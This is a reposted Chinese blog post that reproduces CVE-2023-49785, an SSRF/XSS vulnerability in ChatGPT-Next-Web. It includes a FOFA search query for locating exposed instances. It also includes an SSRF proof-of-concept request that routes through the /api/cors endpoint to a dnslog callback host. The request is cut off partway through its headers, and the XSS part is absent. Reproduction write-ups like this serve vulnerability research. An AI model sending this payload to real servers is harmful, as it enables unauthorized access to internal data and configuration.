0


ChatGPT-Next-Web SSRF漏洞+XSS漏洞复现(CVE-2023-49785)

0x01 产品简介

ChatGPT-Next-Web 是一种基于 OpenAI 的 GPT-3.5 、GPT-4.0语言模型的产品。它是设计用于 Web 环境中的聊天机器人,旨在为用户提供自然语言交互和智能对话的能力。

0x02 漏洞概述

2024年3月,互联网上披露CVE-2023-49785 ChatGPT-Next-Web SSRF/XSS 漏洞,未经身份验证的攻击者可利用此漏洞构造恶意请求获取系统内部敏感信息及配置文件,造成信息泄露。

0x03 复现环境

FOFA:app="ChatGPT-Next-Web"

0x04 漏洞复现

SSRF-PoC

GET /api/cors/http:%2f%2fnextchat.2222222222.pb0e92.dnslog.cn%23 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connectio
标签: chatgpt xss web安全

本文转载自: https://blog.csdn.net/qq_41904294/article/details/136717498
版权归原作者 OidBoy_G 所有, 如有侵权,请联系我们删除。

“ChatGPT-Next-Web SSRF漏洞+XSS漏洞复现(CVE-2023-49785)”的评论:

还没有评论